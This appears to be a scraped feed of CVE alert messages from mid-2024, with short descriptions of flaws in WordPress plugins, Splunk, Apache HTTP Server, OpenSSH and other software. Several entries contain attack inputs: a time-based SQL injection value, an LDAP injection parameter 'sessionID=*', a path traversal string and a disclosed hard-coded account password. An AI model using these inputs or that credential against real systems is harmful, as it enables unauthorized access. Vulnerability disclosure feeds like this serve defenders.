🚨 CVE-2015-0016Directory traversal vulnerability in the TS WebProxy (aka TSWbPrxy) component in Microsoft Windows Vista SP2, Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to gain privileges via a crafted pathname in an executable file, as demonstrated by a transition from Low Integrity to Medium Integrity, aka "Directory Traversal Elevation of Privilege Vulnerability."🎖@cveNotify |
|
| 2024-07-02 12:37:43 |
🚨 CVE-2014-3153The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.🎖@cveNotify |
|
| 2024-07-02 10:38:10 |
🚨 CVE-2024-20893Improper input validation in libmediaextractorservice.so prior to SMR Jul-2024 Release 1 allows local attackers to trigger memory corruption.🎖@cveNotify |
|
| 2024-07-02 10:38:03 |
🚨 CVE-2024-20891Improper access control in launchFullscreenIntent of SystemUI prior to SMR Jul-2024 Release 1 allows local attackers to launch privileged activities.🎖@cveNotify |
|
| 2024-07-02 10:38:02 |
🚨 CVE-2024-20888Improper access control in OneUIHome prior to SMR Jul-2024 Release 1 allows local attackers to launch privileged activities. User interaction is required for triggering this vulnerability.🎖@cveNotify |
|
| 2024-07-02 09:38:54 |
🚨 CVE-2024-5260The Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘read_more_text’ parameter in all versions up to, and including, 3.5.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-02 09:38:53 |
🚨 CVE-2024-37077in OpenHarmony v4.0.0 and prior versions allow a remote attacker arbitrary code execution in pre-installed apps through out-of-bounds write.🎖@cveNotify |
|
| 2024-07-02 09:38:49 |
🚨 CVE-2024-36278in OpenHarmony v4.0.0 and prior versions allow a local attacker cause apps crash through type confusion.🎖@cveNotify |
|
| 2024-07-02 09:38:48 |
🚨 CVE-2024-36243in OpenHarmony v4.0.0 and prior versions allow a remote attacker arbitrary code execution in pre-installed apps through out-of-bounds read and write.🎖@cveNotify |
|
| 2024-07-02 09:38:47 |
🚨 CVE-2024-31071in OpenHarmony v4.0.0 and prior versions allow a local attacker cause apps crash through type confusion.🎖@cveNotify |
|
| 2024-07-02 06:37:34 |
🚨 CVE-2024-5767The sitetweet WordPress plugin through 0.2 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack🎖@cveNotify |
|
| 2024-07-02 06:37:33 |
🚨 CVE-2024-3999The EazyDocs WordPress plugin before 2.5.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-07-02 06:37:32 |
🚨 CVE-2024-1427The The Post Grid – Shortcode, Gutenberg Blocks and Elementor Addon for Post Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the section title tag attribute in all versions up to, and including, 7.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-02 04:38:31 |
🚨 CVE-2023-45924libglxproto.c in OpenGL libglvnd bb06db5a was discovered to contain a segmentation violation via the function glXGetDrawableScreen(). NOTE: this is disputed because there are no common situations in which users require uninterrupted operation with an attacker-controller server.🎖@cveNotify |
|
| 2024-07-01 23:38:12 |
🚨 CVE-2024-6387A signal handler race condition was found in OpenSSH's server (sshd), where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog().🎖@cveNotify |
|
| 2024-07-01 22:38:09 |
🚨 CVE-2024-37764MachForm up to version 19 is affected by an authenticated stored cross-site scripting.🎖@cveNotify |
|
| 2024-07-01 22:38:02 |
🚨 CVE-2024-23736Cross Site Request Forgery (CSRF) vulnerability in savignano S/Notify before 4.0.2 for Confluence allows attackers to manipulate a user's S/MIME certificate of PGP key via malicious link or email.🎖@cveNotify |
|
| 2024-07-01 22:38:01 |
🚨 CVE-2024-6387A signal handler race condition was found in OpenSSH's server (sshd), where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog().🎖@cveNotify |
|
| 2024-07-01 21:38:00 |
🚨 CVE-2024-38367trunk.cocoapods.org is the authentication server for the CoacoaPods dependency manager. Prior to commit d4fa66f49cedab449af9a56a21ab40697b9f7b97, the trunk sessions verification step could be manipulated for owner session hijacking Compromising a victim’s session will result in a full takeover of the CocoaPods trunk account. The threat actor could manipulate their pod specifications, disrupt the distribution of legitimate libraries, or cause widespread disruption within the CocoaPods ecosystem. This was patched server-side with commit d4fa66f49cedab449af9a56a21ab40697b9f7b97 in October 2023.🎖@cveNotify |
|
| 2024-07-01 21:37:54 |
🚨 CVE-2024-38366trunk.cocoapods.org is the authentication server for the CoacoaPods dependency manager. The part of trunk which verifies whether a user has a real email address on signup used a rfc-822 library which executes a shell command to validate the email domain MX records validity. It works via an DNS MX. This lookup could be manipulated to also execute a command on the trunk server, effectively giving root access to the server and the infrastructure. This issue was patched server-side with commit 001cc3a430e75a16307f5fd6cdff1363ad2f40f3 in September 2023. This RCE triggered a full user-session reset, as an attacker could have used this method to write to any Podspec in trunk.🎖@cveNotify |
|
| 2024-07-01 21:37:53 |
🚨 CVE-2024-32228FFmpeg 7.0 is vulnerable to Buffer Overflow. There is a SEGV at libavcodec/hevcdec.c:2947:22 in hevc_frame_end.🎖@cveNotify |
|
| 2024-07-01 21:37:52 |
🚨 CVE-2024-28200The N-central server is vulnerable to an authentication bypass of the user interface. This vulnerability is present in all deployments of N-central prior to 2024.2.This vulnerability was discovered through internal N-central source code review and N-able has not observed any exploitation in the wild.🎖@cveNotify |
|
| 2024-07-01 19:38:13 |
🚨 CVE-2024-39303Weblate is a web based localization tool. Prior to version 5.6.2, Weblate didn't correctly validate filenames when restoring project backup. It may be possible to gain unauthorized access to files on the server using a crafted ZIP file. This issue has been addressed in Weblate 5.6.2. As a workaround, do not allow untrusted users to create projects.🎖@cveNotify |
|
| 2024-07-01 19:38:07 |
🚨 CVE-2024-39251An issue in the component ControlCenter.sys/ControlCenter64.sys of ThundeRobot Control Center v2.0.0.10 allows attackers to access sensitive information, execute arbitrary code, or escalate privileges via sending crafted IOCTL requests.🎖@cveNotify |
|
| 2024-07-01 19:38:06 |
🚨 CVE-2024-38477null pointer dereference in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows an attacker to crash the server via a malicious request.Users are recommended to upgrade to version 2.4.60, which fixes this issue.🎖@cveNotify |
|
| 2024-07-01 19:38:05 |
🚨 CVE-2024-38476Vulnerability in core of Apache HTTP Server 2.4.59 and earlier are vulnerably to information disclosure, SSRF or local script execution via backend applications whose response headers are malicious or exploitable.Users are recommended to upgrade to version 2.4.60, which fixes this issue.🎖@cveNotify |
|
| 2024-07-01 19:38:02 |
🚨 CVE-2024-38475Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. Substitutions in server context that use a backreferences or variables as the first segment of the substitution are affected. Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained.🎖@cveNotify |
|
| 2024-07-01 19:38:01 |
🚨 CVE-2024-38472SSRF in Apache HTTP Server on Windows allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests or content Users are recommended to upgrade to version 2.4.60 which fixes this issue. Note: Existing configurations that access UNC paths will have to configure new directive "UNCList" to allow access during request processing.🎖@cveNotify |
|
| 2024-07-01 19:38:00 |
🚨 CVE-2024-37298gorilla/schema converts structs to and from form values. Prior to version 1.4.1 Running `schema.Decoder.Decode()` on a struct that has a field of type `[]struct{...}` opens it up to malicious attacks regarding memory allocations, taking advantage of the sparse slice functionality. Any use of `schema.Decoder.Decode()` on a struct with arrays of other structs could be vulnerable to this memory exhaustion vulnerability. Version 1.4.1 contains a patch for the issue.🎖@cveNotify |
|
| 2024-07-01 19:37:56 |
🚨 CVE-2024-37146Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability occurs in the `/api/v1/credentials/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a specially crafted URL that injects Javascript into the user sessions, allowing the attacker to steal information, create false popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page, allowing an attacker to steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available.🎖@cveNotify |
|
| 2024-07-01 19:37:55 |
🚨 CVE-2024-6387A signal handler race condition was found in OpenSSH's server (sshd), where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog().🎖@cveNotify |
|
| 2024-07-01 17:38:20 |
🚨 CVE-2024-39878In JetBrains TeamCity before 2024.03.3 private key could be exposed via testing GitHub App Connection🎖@cveNotify |
|
| 2024-07-01 17:38:19 |
🚨 CVE-2024-36995In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10 and Splunk Cloud Platform versions below 9.1.2312.200 and 9.1.2308.207, a low-privileged user that does not hold the admin or power Splunk roles could create experimental items.🎖@cveNotify |
|
| 2024-07-01 17:38:14 |
🚨 CVE-2024-36993In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10 and Splunk Cloud Platform versions below 9.1.2312.200 and 9.1.2308.207, a low-privileged user that does not hold the admin or power Splunk roles could craft a malicious payload through a Splunk Web Bulletin Messages that could result in execution of unauthorized JavaScript code in the browser of a user.🎖@cveNotify |
|
| 2024-07-01 17:38:13 |
🚨 CVE-2024-36990In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10 and Splunk Cloud Platform versions below 9.2.2403.100, an authenticated, low-privileged user that does not hold the admin or power Splunk roles could send a specially crafted HTTP POST request to the datamodel/web REST endpoint in Splunk Enterprise, potentially causing a denial of service.🎖@cveNotify |
|
| 2024-07-01 17:38:09 |
🚨 CVE-2024-36987In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10 and Splunk Cloud Platform versions below 9.1.2312.200, an authenticated, low-privileged user who does not hold the admin or power Splunk roles could upload a file with an arbitrary extension using the indexing/preview REST endpoint.🎖@cveNotify |
|
| 2024-07-01 17:38:08 |
🚨 CVE-2024-36985In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10, a low-privileged user that does not hold the admin or power Splunk roles could cause a Remote Code Execution through an external lookup that references the “splunk_archiver“ application.🎖@cveNotify |
|
| 2024-07-01 17:38:07 |
🚨 CVE-2024-36984In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10 on Windows, an authenticated user could execute a specially crafted query that they could then use to serialize untrusted data. The attacker could use the query to execute arbitrary code.🎖@cveNotify |
|
| 2024-07-01 17:38:03 |
🚨 CVE-2024-36982In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10 and Splunk Cloud Platform versions below 9.1.2312.109 and 9.1.2308.207, an attacker could trigger a null pointer reference on the cluster/config REST endpoint, which could result in a crash of the Splunk daemon.🎖@cveNotify |
|
| 2024-07-01 17:38:02 |
🚨 CVE-2024-6387A signal handler race condition was found in OpenSSH's server (sshd), where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog().🎖@cveNotify |
|
| 2024-07-01 17:07:45 |
🚨 CVE-2024-38994amoyjs amoy common v1.0.10 was discovered to contain a prototype pollution via the function extend. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-07-01 17:07:39 |
🚨 CVE-2024-38993rjrodger jsonic-next v2.12.1 was discovered to contain a prototype pollution via the function empty. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-07-01 17:07:38 |
🚨 CVE-2024-38990Tada5hi sp-common v0.5.4 was discovered to contain a prototype pollution via the function mergeDeep. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-07-01 17:07:37 |
🚨 CVE-2024-38987aofl cli-lib v3.14.0 was discovered to contain a prototype pollution via the component defaultsDeep. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-07-01 13:38:29 |
🚨 CVE-2024-39015cafebazaar hod v0.4.14 was discovered to contain a prototype pollution via the function request. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-07-01 13:38:28 |
🚨 CVE-2024-390132o3t-utility v0.1.2 was discovered to contain a prototype pollution via the function extend. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-07-01 13:38:24 |
🚨 CVE-2024-39003amoyjs amoy common v1.0.10 was discovered to contain a prototype pollution via the function setValue. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-07-01 13:38:23 |
🚨 CVE-2024-39000adolph_dudu ratio-swiper v0.0.2 was discovered to contain a prototype pollution via the function parse. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-07-01 13:38:19 |
🚨 CVE-2024-38999jrburke requirejs v2.3.6 was discovered to contain a prototype pollution via the function s.contexts._.configure. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-07-01 13:38:18 |
🚨 CVE-2024-38997adolph_dudu ratio-swiper v0.0.2 was discovered to contain a prototype pollution via the function extendDefaults. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-07-01 13:38:17 |
🚨 CVE-2024-38994amoyjs amoy common v1.0.10 was discovered to contain a prototype pollution via the function extend. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-07-01 13:38:13 |
🚨 CVE-2024-38992airvertco frappejs v0.0.11 was discovered to contain a prototype pollution via the function registerView. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-07-01 13:38:12 |
🚨 CVE-2024-38987aofl cli-lib v3.14.0 was discovered to contain a prototype pollution via the component defaultsDeep. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-07-01 13:09:19 |
🚨 CVE-2024-38521Hush Line is a free and open-source, anonymous-tip-line-as-a-service for organizations or individuals. There is a stored XSS in the Inbox. The input is displayed using the `safe` Jinja2 attribute, and thus not sanitized upon display. This issue has been patched in version 0.1.0.🎖@cveNotify |
|
| 2024-07-01 13:09:13 |
🚨 CVE-2024-35139IBM Security Access Manager Docker 10.0.0.0 through 10.0.7.1 could allow a local user to obtain sensitive information from the container due to incorrect default permissions. IBM X-Force ID: 292415.🎖@cveNotify |
|
| 2024-07-01 13:09:12 |
🚨 CVE-2024-38531Nix is a package manager for Linux and other Unix systems that makes package management reliable and reproducible. A build process has access to and can change the permissions of the build directory. After creating a setuid binary in a globally accessible location, a malicious local user can assume the permissions of a Nix daemon worker and hijack all future builds. This issue was patched in version(s) 2.23.1, 2.22.2, 2.21.3, 2.20.7, 2.19.5 and 2.18.4.🎖@cveNotify |
|
| 2024-07-01 13:09:11 |
🚨 CVE-2024-29038tpm2-tools is the source repository for the Trusted Platform Module (TPM2.0) tools. A malicious attacker can generate arbitrary quote data which is not detected by `tpm2 checkquote`. This issue was patched in version 5.7.🎖@cveNotify |
|
| 2024-07-01 10:38:14 |
🚨 CVE-2024-5710berriai/litellm version 1.34.34 is vulnerable to improper access control in its team management functionality. This vulnerability allows attackers to perform unauthorized actions such as creating, updating, viewing, deleting, blocking, and unblocking any teams, as well as adding or deleting any member to or from any teams. The vulnerability stems from insufficient access control checks in various team management endpoints, enabling attackers to exploit these functionalities without proper authorization.🎖@cveNotify |
|
| 2024-07-01 06:38:19 |
🚨 CVE-2023-4727A flaw was found in dogtag-pki and pki-core. The token authentication scheme can be bypassed with a LDAP injection. By passing the query string parameter sessionID=*, an attacker can authenticate with an existing session saved in the LDAP directory server, which may lead to escalation of privilege.🎖@cveNotify |
|
| 2024-07-01 05:42:18 |
None |
|
| 2024-06-30 23:38:02 |
🚨 CVE-2024-6418A vulnerability classified as critical has been found in SourceCodester Medicine Tracker System 1.0. This affects an unknown part of the file /classes/Users.php?f=register_user. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-270009 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-30 23:38:01 |
🚨 CVE-2023-48733An insecure default to allow UEFI Shell in EDK2 was left enabled in Ubuntu's EDK2. This allows an OS-resident attacker to bypass Secure Boot.🎖@cveNotify |
|
| 2024-06-30 22:37:48 |
🚨 CVE-2024-6416A vulnerability was found in SeaCMS 12.9. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /js/player/dmplayer/dmku/?ac=edit. The manipulation of the argument cid with the input (select(0)from(select(sleep(10)))v) leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-270007.🎖@cveNotify |
|
| 2024-06-30 21:37:37 |
🚨 CVE-2024-34703Botan is a C++ cryptography library. X.509 certificates can identify elliptic curves using either an object identifier or using explicit encoding of the parameters. Prior to versions 3.3.0 and 2.19.4, an attacker could present an ECDSA X.509 certificate using explicit encoding where the parameters are very large. The proof of concept used a 16Kbit prime for this purpose. When parsing, the parameter is checked to be prime, causing excessive computation. This was patched in 2.19.4 and 3.3.0 to allow the prime parameter of the elliptic curve to be at most 521 bits. No known workarounds are available. Note that support for explicit encoding of elliptic curve parameters is deprecated in Botan.🎖@cveNotify |
|
| 2024-06-30 19:37:25 |
🚨 CVE-2023-50964IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 276102.🎖@cveNotify |
|
| 2024-06-30 17:37:28 |
🚨 CVE-2024-28798IBM InfoSphere Information Server 11.7 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 287172.🎖@cveNotify |
|
| 2024-06-30 17:37:27 |
🚨 CVE-2023-50954IBM InfoSphere Information Server 11.7 returns sensitive information in URL information that could be used in further attacks against the system. IBM X-Force ID: 275776.🎖@cveNotify |
|
| 2024-06-30 16:37:54 |
🚨 CVE-2024-5062A reflected Cross-Site Scripting (XSS) vulnerability was identified in zenml-io/zenml version 0.57.1. The vulnerability exists due to improper neutralization of input during web page generation, specifically within the survey redirect parameter. This flaw allows an attacker to redirect users to a specified URL after completing a survey, without proper validation of the 'redirect' parameter. Consequently, an attacker can execute arbitrary JavaScript code in the context of the user's browser session. This vulnerability could be exploited to steal cookies, potentially leading to account takeover.🎖@cveNotify |
|
| 2024-06-30 16:37:53 |
🚨 CVE-2023-35022IBM InfoSphere Information Server 11.7 could allow a local user to update projects that they do not have the authorization to access. IBM X-Force ID: 258254.🎖@cveNotify |
|
| 2024-06-30 15:37:30 |
🚨 CVE-2024-33602nscd: netgroup cache assumes NSS callback uses in-buffer stringsThe Name Service Cache Daemon's (nscd) netgroup cache can corrupt memorywhen the NSS callback does not store all strings in the provided buffer.The flaw was introduced in glibc 2.15 when the cache was added to nscd.This vulnerability is only present in the nscd binary.🎖@cveNotify |
|
| 2024-06-30 15:37:29 |
🚨 CVE-2024-33600nscd: Null pointer crashes after notfound responseIf the Name Service Cache Daemon's (nscd) cache fails to add a not-foundnetgroup response to the cache, the client request can result in a nullpointer dereference. This flaw was introduced in glibc 2.15 when thecache was added to nscd.This vulnerability is only present in the nscd binary.🎖@cveNotify |
|
| 2024-06-30 15:37:28 |
🚨 CVE-2024-33599nscd: Stack-based buffer overflow in netgroup cacheIf the Name Service Cache Daemon's (nscd) fixed size cache is exhaustedby client requests then a subsequent client request for netgroup datamay result in a stack-based buffer overflow. This flaw was introducedin glibc 2.15 when the cache was added to nscd.This vulnerability is only present in the nscd binary.🎖@cveNotify |
|
| 2024-06-30 12:37:56 |
🚨 CVE-2024-38439Netatalk before 3.2.1 has an off-by-one error and resultant heap-based buffer overflow because of setting ibuf[PASSWDLEN] to '\0' in FPLoginExt in login in etc/uams/uams_pam.c. 2.4.1 and 3.1.19 are also fixed versions.🎖@cveNotify |
|
| 2024-06-30 11:37:53 |
🚨 CVE-2020-36829The Mojolicious module before 8.65 for Perl is vulnerable to secure_compare timing attacks that allow an attacker to guess the length of a secret string. Only versions after 1.74 are affected.🎖@cveNotify |
|
| 2024-06-30 04:38:18 |
🚨 CVE-2024-6415A vulnerability classified as problematic was found in Ingenico Estate Manager 2023. Affected by this vulnerability is an unknown functionality of the file /emgui/rest/preferences/PREF_HOME_PAGE/sponsor/3/ of the component New Widget Handler. The manipulation of the argument URL leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-270001 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-30 03:38:00 |
🚨 CVE-2024-6414A vulnerability classified as problematic has been found in Parsec Automation TrakSYS 11.x.x. Affected is an unknown function of the file TS/export/contentpage of the component Export Page. The manipulation of the argument ID leads to direct request. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-270000. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-30 02:37:38 |
🚨 CVE-2024-39828R74n Sandboxels 1.9 through 1.9.5 allows XSS via a message in a modified saved-game file. This was fixed in a hotfix to 1.9.5 on 2024-06-29.🎖@cveNotify |
|
| 2024-06-30 01:38:02 |
🚨 CVE-2024-5926Path Traversal: '\..\filename' in GitHub repository stitionai/devika prior to -.🎖@cveNotify |
|
| 2024-06-29 22:37:28 |
🚨 CVE-2024-39848Internet2 Grouper before 5.6 allows authentication bypass when LDAP authentication is used in certain ways. This is related to internet2.middleware.grouper.ws.security.WsGrouperLdapAuthentication and the use of the UyY29r password for the M3vwHr account. This also affects "Grouper for Web Services" before 4.13.1.🎖@cveNotify |
|
| 2024-06-29 21:37:24 |
🚨 CVE-2024-39846NewPass before 1.2.0 stores passwords (rather than password hashes) directly, which makes it easier to obtain unauthorized access to sensitive information. NOTE: in each case, data at rest is encrypted, but is decrypted within process memory during use.🎖@cveNotify |
|
| 2024-06-29 17:37:50 |
🚨 CVE-2024-39840Factorio before 1.1.101 allows a crafted server to execute arbitrary code on clients via a custom map that leverages the ability of certain Lua base module functions to execute bytecode and generate fake objects.🎖@cveNotify |
|
| 2024-06-29 13:37:31 |
🚨 CVE-2024-25943iDRAC9, versions prior to 7.00.00.172 for 14th Generation and 7.10.50.00 for 15th and 16th Generations, contains a session hijacking vulnerability in IPMI. A remote attacker could potentially exploit this vulnerability, leading to arbitrary code execution on the vulnerable application.🎖@cveNotify |
|
| 2024-06-29 12:37:51 |
🚨 CVE-2023-4017The Goya theme for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘attra-color’, 'attra-size', and 'product-cata' parameters in versions up to, and including, 1.0.8.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-29 10:37:56 |
🚨 CVE-2024-5819The Gutenberg Blocks with AI by Kadence WP – Page Builder Features plugin for WordPress is vulnerable to DOM-based Stored Cross-Site Scripting via HTML data attributes in all versions up to, and including, 3.2.45 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-29 07:37:32 |
🚨 CVE-2024-5666The Extensions for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter within the EE Button widget in all versions up to, and including, 2.0.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-29 07:37:31 |
🚨 CVE-2024-39331In Emacs before 29.4, org-link-expand-abbrev in lisp/ol.el expands a %(...) link abbrev even when it specifies an unsafe function, such as shell-command-to-string. This affects Org Mode before 9.7.5.🎖@cveNotify |
|
| 2024-06-29 05:37:34 |
🚨 CVE-2024-6265The UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘uwp_sort_by’ parameter in all versions up to, and including, 1.2.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-06-29 05:37:33 |
🚨 CVE-2024-5889The Events Manager – Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘country’ parameter in all versions up to, and including, 6.4.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-29 05:37:32 |
🚨 CVE-2024-5192The Funnel Builder for WordPress by FunnelKit – Customize WooCommerce Checkout Pages, Create Sales Funnels, Order Bumps & One Click Upsells plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘mimes’ parameter in all versions up to, and including, 3.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-29 02:38:03 |
🚨 CVE-2024-6405The Floating Social Buttons plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the floating_social_buttons_option() function. This makes it possible for unauthenticated attackers to update the plugins settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-29 00:37:35 |
🚨 CVE-2019-25211parseWildcardRules in Gin-Gonic CORS middleware before 1.6.0 mishandles a wildcard at the end of an origin string, e.g., https://example.community/* is allowed when the intention is that only https://example.com/* should be allowed, and http://localhost.example.com/* is allowed when the intention is that only http://localhost/* should be allowed.🎖@cveNotify |
|
| 2024-06-28 22:38:13 |
🚨 CVE-2024-38533ZKsync Era is a layer 2 rollup that uses zero-knowledge proofs to scale Ethereum. There is possible invalid stack access due to the addresses used to access the stack not properly being converted to cells. This issue has been patched in version 1.5.0.🎖@cveNotify |
|
| 2024-06-28 22:38:12 |
🚨 CVE-2024-37370In MIT Kerberos 5 (aka krb5) before 1.21.3, an attacker can modify the plaintext Extra Count field of a confidential GSS krb5 wrap token, causing the unwrapped token to appear truncated to the application.🎖@cveNotify |
|
| 2024-06-28 21:37:43 |
🚨 CVE-2024-39302BigBlueButton is an open-source virtual classroom designed to help teachers teach and learners learn. An attacker may be able to exploit the overly elevated file permissions in the `/usr/local/bigbluebutton/core/vendor/bundle/ruby/2.7.0/gems/resque-2.6.0` directory with the goal of privilege escalation, potentially exposing sensitive information on the server. This issue has been patched in version(s) 2.6.18, 2.7.8 and 3.0.0-alpha.7.🎖@cveNotify |
|
| 2024-06-28 21:37:42 |
🚨 CVE-2024-29040This repository hosts source code implementing the Trusted Computing Group's (TCG) TPM2 Software Stack (TSS). The JSON Quote Info returned by Fapi_Quote has to be deserialized by Fapi_VerifyQuote to the TPM Structure `TPMS_ATTEST`. For the field `TPM2_GENERATED magic` of this structure any number can be used in the JSON structure. The verifier can receive a state which does not represent the actual, possibly malicious state of the device under test. The malicious device might get access to data it shouldn't, or can use services it shouldn't be able to. This issue has been patched in version 4.1.0.🎖@cveNotify |
|
| 2024-06-28 20:37:45 |
🚨 CVE-2024-5712Cross-Site Request Forgery (CSRF) in stitionai/devika🎖@cveNotify |
|
| 2024-06-28 20:37:44 |
🚨 CVE-2024-3995In Helix ALM versions prior to 2024.2.0, a local command injection was identified. Reported by Bryan Riggins.🎖@cveNotify |
|
| 2024-06-28 20:37:43 |
